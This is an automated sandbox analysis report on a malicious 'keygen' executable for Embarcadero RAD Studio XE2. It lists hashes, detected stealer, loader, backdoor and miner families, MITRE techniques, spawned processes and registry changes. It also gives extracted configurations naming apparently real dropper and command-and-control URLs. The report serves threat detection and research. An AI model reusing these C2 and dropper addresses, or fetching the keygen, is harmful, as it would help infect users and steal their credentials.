azorult | 37b25935d3f553e75c64eaaa79b9740ab95b90b2007bdd21256fdc7ffa0ba473

Analysis

max time kernel
34s
max time network
601s
platform
windows10_x64
resource
win10v20201028
submitted
03-04-2021 06:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Embarcadero.RAD.Studio.XE2.Arc.keygen.exe
Size

5.4MB
MD5

71e1b5c96e0b450768b799f4f2ba8c6a
SHA1

d974040a5020d4132094f04d42edfb24c28b3c1a
SHA256

16bd29c401eabb1c1d158f615fab03d81d6db786d936c4f3d3f929a16162d1c2
SHA512

96009bbccfedc418a4ed8a02d19e9c42f90eb6f9827ae0da554e1d8d4a8eb89255e0434eaec0ebf2b72967b52fb604845c85819bf7ccc82ef912edb8dd8cbdfc

Score

10^/10

azorult glupteba metasploit netsupport raccoon smokeloader xmrig afefd33a49c7cbd55d417545269920f24c85aa37 backdoor discovery dropper evasion infostealer loader miner rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://labsclub.com/welcome

Extracted

Family

azorult

http://kvaka.li/1210776429.php

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32

Extracted

Family

raccoon

Botnet

afefd33a49c7cbd55d417545269920f24c85aa37

Attributes

url4cnc
https://telete.in/jagressor_kz

rc4.plain

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 3 IoCs

resource	yara_rule
behavioral3/memory/5168-222-0x0000000002510000-0x0000000002E1A000-memory.dmp	family_glupteba
behavioral3/memory/5168-224-0x0000000000400000-0x0000000000D24000-memory.dmp	family_glupteba
behavioral3/memory/5168-225-0x0000000000400000-0x0000000000D24000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
rat netsupport
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518

XMRig Miner Payload 8 IoCs

miner

resource	yara_rule
behavioral3/memory/4272-153-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral3/memory/4272-154-0x00000001402CA898-mapping.dmp	xmrig
behavioral3/memory/4272-158-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral3/memory/4272-233-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral3/memory/4692-943-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral3/memory/4692-1015-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral3/memory/6656-1087-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral3/memory/6656-1156-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig

Executes dropped EXE 13 IoCs

pid	Process
804	keygen-pr.exe
2696	keygen-step-1.exe
1168	keygen-step-3.exe
4000	keygen-step-4.exe
3992	key.exe
956	MicrosoftEdge.exe
3728	multitimer.exe
904	setups.exe
2236	askinstall20.exe
2704	setups.tmp
4496	Full Program Features.exe
4612	file.exe
4740	multitimer.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	setups.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	app.exe

Loads dropped DLL 7 IoCs

pid	Process
2704	setups.tmp
2704	setups.tmp
2704	setups.tmp
2704	setups.tmp
2704	setups.tmp
2704	setups.tmp
2704	setups.tmp

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	app.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 13 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
553	ipinfo.io
564	ipinfo.io
73	api.ipify.org
136	ipinfo.io
187	ip-api.com
299	ipinfo.io
301	ipinfo.io
444	api.ipify.org
570	ipinfo.io
597	ipinfo.io
134	ipinfo.io
279	api.ipify.org
476	ip-api.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\unins.vbs	Full Program Features.exe
File created	C:\Program Files\unins0000.dat	Full Program Features.exe
File created	C:\Program Files\unins0000.dll	Full Program Features.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 16 IoCs

pid	pid_target	Process	procid_target
4804	4436	WerFault.exe	242
4336	580	WerFault.exe	240
7776	2448	WerFault.exe	163
8764	2448	WerFault.exe	163
6984	2448	WerFault.exe	163
6880	2448	WerFault.exe	163
6944	2448	WerFault.exe	163
5036	2448	WerFault.exe	163
8212	6056	WerFault.exe	144
7800	2448	WerFault.exe	163
4028	2448	WerFault.exe	163
5432	2448	WerFault.exe	163
9224	2448	WerFault.exe	163
9872	2448	WerFault.exe	163
9532	2448	WerFault.exe	163
7908	5112	WerFault.exe	424

Delays execution with timeout.exe 9 IoCs

evasion

pid	Process
7360	timeout.exe
9772	timeout.exe
8264	timeout.exe
6724	timeout.exe
8188	timeout.exe
6976	timeout.exe
9752	timeout.exe
5352	timeout.exe
7660	timeout.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe

Kills process with taskkill 10 IoCs

evasion

pid	Process
9036	taskkill.exe
7328	taskkill.exe
8428	taskkill.exe
9800	taskkill.exe
7628	taskkill.exe
3672	taskkill.exe
4544	taskkill.exe
2192	taskkill.exe
4516	taskkill.exe
392	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	app.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI = "{9019A937-E073-4E19-8A54-5E7B01F14FB0}"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History	app.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache	app.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	app.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 010000008d32be751d7b00bceb9c2c5e7642bf97652ff2cda2d40879e2a0666b540858e30e6ea3d052671103a4f82450bbd0f4fefaa317222c176418bcf8aa0f0fa1c16c6ac34adbca0895cbfe346099c0bc33201c012e1a019ffd200281940968a7119107d1bc52b17eec6ba6f161970e25c4c099e7d1cef88bf51bdbda5d45323ab3f32d38fa193ceaaed10fd0f84d962a601b01f71b41c0fdcde7eaa573825d7a4d4a14986324ca6aa0cf4c6f2c6d28ed33945acf3c4acd1435ea188123b50687fc3eca9041e9e11f0eb9686f7ca4c08cc03690109c1a16f04a97fe0d807b7b81c80dd4c2506c562a5e4fc5706fb36b29b409785b764618b1ee437bebbc9e5288f804cdcd66d25ca980fdaf124bcac2e2b42ad14e4d64da761e4c0cbab2a32dbcd8c89b514f89cdbd1f63b0f532455dd9cec3648b803edb614486aa19d970013d086ea2ee08fdd1868a368cb98917a72cb7c712b0658f24914b0701aae1fd192b5d64a344cae17b25166b6affea4735fdab85bc5ead4d5d26f338690c171700a662291ef3c70309b869b02c652d76ab6a230843369f900e40753bb98aaf4239e1149c23acf791f704	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	app.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000939595d40bead9fe9d88e1a3d4d8bc96436404f0ef4d9187f8ecefebdcfb33be3a0bf8871029eb6c95eb83ab7d50b1ca001e3db102bf8a6f12b825e2c1393c3797716ace1895d0307bc79d943d2ae8f4c128b557aa1e5384faa8	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	app.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = b32dddac5528d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content	app.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{D002E0CF-9BAE-4679-828A-DD2ABF7A6BBA} = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache	app.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies	app.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompleted = "1"	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	askinstall20.exe
